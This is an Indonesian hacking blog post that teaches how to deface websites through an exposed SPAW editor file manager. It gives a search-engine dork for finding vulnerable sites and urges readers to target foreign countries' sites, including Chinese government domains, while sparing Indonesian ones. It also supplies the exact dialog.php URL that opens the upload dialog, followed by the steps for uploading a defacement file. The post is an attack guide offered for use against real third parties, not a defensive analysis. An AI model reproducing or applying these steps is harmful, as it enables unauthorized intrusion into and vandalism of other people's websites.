DEFACE WEBSITE MELALUI SPAW UPLOADS VULNERABILITY
Deface Website Melalui Spaw Uploads Vulnerability (By Cirebon Cyber)
Caranya:
1). Pertama, Masukan Dorknya : inurl:”spaw2/uploads/files/” atau
inurl:”spaw2/uploads/files/” site:th
Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc (ingat, jangan site:co.id (site negara kita bro))
2). Setelah sobat masuk kedalam websitenya, sobat lihat Url di Addressbar. Contoh Urlnya :
http://TARGET/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Sehingga menjadi:
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
4). Tekan Enter, nanti akan terbuka sendiri
5). Selanjutnya akan muncul Gambar, dan terlihat tutorial pada Gambar..
6). selanjutnya lagi, pilih File Deface Anda, lalu klik Open dan Tunggu hingga Loading selesai..
7). Selanjutnya Klik Tombol Upload.
8). Jika Proses Upload Selesai, akan muncul Daftar File dan akan terdapat File yang telah Anda upload tadi.
9). Selesai, dan contoh hasil pada : http://hacker.website.org/
Kuasai yang telah difahami, pelajari yang telah dibaca, bagikan ketika telah mengetahui dampak positif dan negatifnya. Mari terus belajar, dunia semaki maju dan teknologi semakin hari semakin inovatif. Semoga yang kita dapat dari dunia maya ini, menjadikan kita bermanfaat bagi manusia dan alam ini.
Pencarian lainnya
Langganan:
Posting Komentar (Atom)
Mari Berbagi, Berbagi itu Indah...
"BERBAGI ITU INDAH"
Anda dapat "mengirimkan ide/karya menarik berupa tulisan/gambar/video" ke Email kami.
Karya Anda akan dipublikasikan melalui Blog ini..
catatan: Karya/ide Anda sudah harus final.. trims atas partisipasinya.
Kirim sesuatu ke Blog ini
Tidak ada komentar:
Posting Komentar